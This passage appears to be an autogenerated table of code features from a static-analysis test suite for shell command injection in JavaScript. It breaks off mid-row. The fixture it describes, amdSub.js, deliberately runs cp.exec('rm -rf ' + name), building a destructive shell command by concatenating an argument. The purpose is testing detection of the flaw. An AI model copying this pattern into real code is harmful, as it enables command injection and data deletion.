autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:18:2:24 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:18:2:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:18:2:24 | require | contextSurroundingFunctionParameters | (require) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:18:2:24 | require | enclosingFunctionBody | require amdSub require ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:18:2:24 | require | enclosingFunctionBody | require amdSub require ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:18:2:24 | require | enclosingFunctionName | define#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:18:2:24 | require | enclosingFunctionName | define#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:18:2:24 | require | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:18:2:24 | require | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:3:10:5:3 | {\\n a ... "),\\n } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:3:10:5:3 | {\\n a ... "),\\n } | contextSurroundingFunctionParameters | (require) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:3:10:5:3 | {\\n a ... "),\\n } | enclosingFunctionBody | require amdSub require ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:3:10:5:3 | {\\n a ... "),\\n } | enclosingFunctionName | define#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:3:10:5:3 | {\\n a ... "),\\n } | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:5:4:10 | amdSub | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:5:4:10 | amdSub | contextSurroundingFunctionParameters | (require) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:5:4:10 | amdSub | enclosingFunctionBody | require amdSub require ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:5:4:10 | amdSub | enclosingFunctionName | define#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:5:4:10 | amdSub | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:5:4:31 | amdSub: ... mdSub") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:5:4:31 | amdSub: ... mdSub") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:5:4:31 | amdSub: ... mdSub") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:5:4:31 | amdSub: ... mdSub") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:5:4:31 | amdSub: ... mdSub") | enclosingFunctionBody | require amdSub require ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:5:4:31 | amdSub: ... mdSub") | enclosingFunctionBody | require amdSub require ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:5:4:31 | amdSub: ... mdSub") | enclosingFunctionName | define#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:5:4:31 | amdSub: ... mdSub") | enclosingFunctionName | define#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:5:4:31 | amdSub: ... mdSub") | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:5:4:31 | amdSub: ... mdSub") | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:19 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:19 | require | contextSurroundingFunctionParameters | (require) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:19 | require | enclosingFunctionBody | require amdSub require ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:19 | require | enclosingFunctionName | define#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:19 | require | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:31 | exceptional return of require("./amdSub") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:31 | exceptional return of require("./amdSub") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:31 | exceptional return of require("./amdSub") | enclosingFunctionBody | require amdSub require ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:31 | exceptional return of require("./amdSub") | enclosingFunctionName | define#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:31 | exceptional return of require("./amdSub") | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:31 | require("./amdSub") | assignedToPropName | amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:31 | require("./amdSub") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:31 | require("./amdSub") | contextSurroundingFunctionParameters | (require) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:31 | require("./amdSub") | enclosingFunctionBody | require amdSub require ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:31 | require("./amdSub") | enclosingFunctionName | define#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:31 | require("./amdSub") | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:21:4:30 | "./amdSub" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:21:4:30 | "./amdSub" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:21:4:30 | "./amdSub" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:21:4:30 | "./amdSub" | contextSurroundingFunctionParameters | (require) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:21:4:30 | "./amdSub" | enclosingFunctionBody | require amdSub require ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:21:4:30 | "./amdSub" | enclosingFunctionName | define#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:21:4:30 | "./amdSub" | fileImports | ./amdSub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:1:1:0 | this | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:1:1:0 | this | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:1:1:1 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:1:1:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:1:1:1 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:1:1:1 | module | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:1:1:1 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:1:1:1 | module | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:1:1:1 | require | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:1:1:1 | require | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:7:1:8 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:7:1:8 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:7:1:8 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:7:1:8 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:7:1:35 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:7:1:35 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:7:1:35 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:7:1:35 | cp = re ... ocess") | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:7:1:35 | cp = re ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:7:1:35 | cp = re ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:12:1:18 | require | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:12:1:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:12:1:18 | require | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:12:1:35 | exceptional return of require ... ocess") | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:12:1:35 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:12:1:35 | exceptional return of require ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:12:1:35 | require ... ocess") | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:12:1:35 | require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:12:1:35 | require ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:20:1:34 | "child_process" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:20:1:34 | "child_process" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:20:1:34 | "child_process" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:20:1:34 | "child_process" | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:20:1:34 | "child_process" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:20:1:34 | "child_process" | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:1:3:6 | module | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:1:3:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:1:3:6 | module | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:1:3:14 | module.exports | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:1:3:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:1:3:14 | module.exports | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:1:5:1 | module. ... d.js`\\n} | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:1:5:1 | module. ... d.js`\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:1:5:1 | module. ... d.js`\\n} | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:8:3:14 | exports | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:8:3:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:8:3:14 | exports | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:3:17 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:3:17 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:3:17 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:3:17 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:3:17 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:3:17 | this | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:3:17 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:3:17 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:3:17 | this | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:3:17 | this | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | 'arguments' object of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | 'arguments' object of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | exceptional return of anonymous function | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | exceptional return of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | exceptional return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | functio ... d.js`\\n} | assignedToPropName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | functio ... d.js`\\n} | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | functio ... d.js`\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | functio ... d.js`\\n} | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | return of anonymous function | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | return of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:18:5:1 | return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:28:3:31 | name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:28:3:31 | name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:28:3:31 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:28:3:31 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:28:3:31 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:28:3:31 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:28:3:31 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:28:3:31 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:28:3:31 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:3:28:3:31 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:3 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:3 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:3 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:3 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:8 | cp.exec | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:8 | cp.exec | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:8 | cp.exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:26 | cp.exec ... + name) | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:26 | cp.exec ... + name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:26 | cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:26 | exceptional return of cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:5:4:8 | exec | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:5:4:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:5:4:8 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:5:4:8 | exec | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:5:4:8 | exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:10:4:18 | "rm -rf " | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:10:4:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:10:4:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:10:4:18 | "rm -rf " | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:10:4:18 | "rm -rf " | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:10:4:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:10:4:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:10:4:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:10:4:25 | "rm 